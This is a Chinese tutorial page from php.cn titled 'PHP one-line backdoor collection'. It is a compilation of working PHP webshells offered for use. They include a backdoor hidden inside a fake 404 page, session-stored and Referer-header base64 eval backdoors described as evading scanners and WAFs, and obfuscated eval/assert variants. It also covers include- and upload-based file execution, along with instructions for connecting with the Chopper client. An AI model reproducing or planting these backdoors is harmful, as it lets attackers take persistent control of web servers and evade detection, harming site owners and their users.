Home > php教程 > php手册 > PHP一句话后门集锦

PHP一句话后门集锦

WBOY
Release: 2016-06-06 20:09:31
Original
1344 people have browsed it

404页面的利用: !DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN" htmlhead title 404 Not Found /title /headbody h1 Not Found /h1 p The requested URL was not found on this server. /p /body/html ? php @preg_replace ( "/[pageerror]/e" , $_POST

404页面的利用:



404 Not Found

Not Found

The requested URL was not found on this server.



php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header
('HTTP/1.1 404 Not Found');
?>

404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

无特征隐藏后门:

php
session_start
();

$_POST
['code']&& $_SESSION['theCode']= trim($_POST['code']);
$_SESSION
['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码将无法检查到。

利用GET函数构成后门:

php $_GET[a]($_GET[b]);?>

利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马。

层级请求,编码运行PHP后门:

此方法用两个文件实现。

文件1:

php
//1.php
header
('Content-type:text/html;charset=utf-8');
parse_str
($_SERVER['HTTP_REFERER'], $a);
if(reset($a)=='10'&& count($a)==9){
eval(base64_decode(str_replace(" ","+", implode(array_slice($a,6)))));
}

文件2:

php
//2.php

header
('Content-type:text/html;charset=utf-8');
//要执行的代码
$code
=CODE
phpinfo
();

CODE
;
//进行base64编码
$code
= base64_encode($code);
//构造referer字符串
$referer
="a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url
='http://localhost/test1/1.php';
$ch
= curl_init();
$options
= array(
    CURLOPT_URL
=> $url,
    CURLOPT_HEADER
=> FALSE,
    CURLOPT_RETURNTRANSFER
=> TRUE,
    CURLOPT_REFERER
=> $referer
);

curl_setopt_array
($ch, $options);
echo curl_exec
($ch);

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf(Web Application Firewall / Web应用防护系统)对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。

三个变形的一句话PHP木马:

1、php ($_=@$_GET[2]).@$_($_POST[1])?>

菜刀连接http://site/1.php?2=assert ,密码为1。

2php
$_
="";
$_
[+""]='';
$_
="$_"."";
$_
=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
php ${'_'.$_}['_'](${'_'.$_}['__']);?>

在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

3、($b4dboy = $_POST['b4dboy'])&&@preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)','add');

str_rot13(‘riny’)即编码后的eval,完全避开了关键字。

其他一些PHP一句话木马后门:

php @eval_r($_POST[a])?>
//典型一句话

$hh ="p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh
("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话

$filename=$_GET['xbid'];
include
($filename);
//危险的include函数,直接编译任何文件为php格式运行

$reg="c"."o"."p"."y";
$reg
($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件

$gzid ="p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid
("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话

include ($uid);
//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句话

script language="php">@eval_r($_POST[a])script>
//绕过
php assert($_POST[a]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句

php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入O>h=@eval_r($_POST1);O>

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Recommendations
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template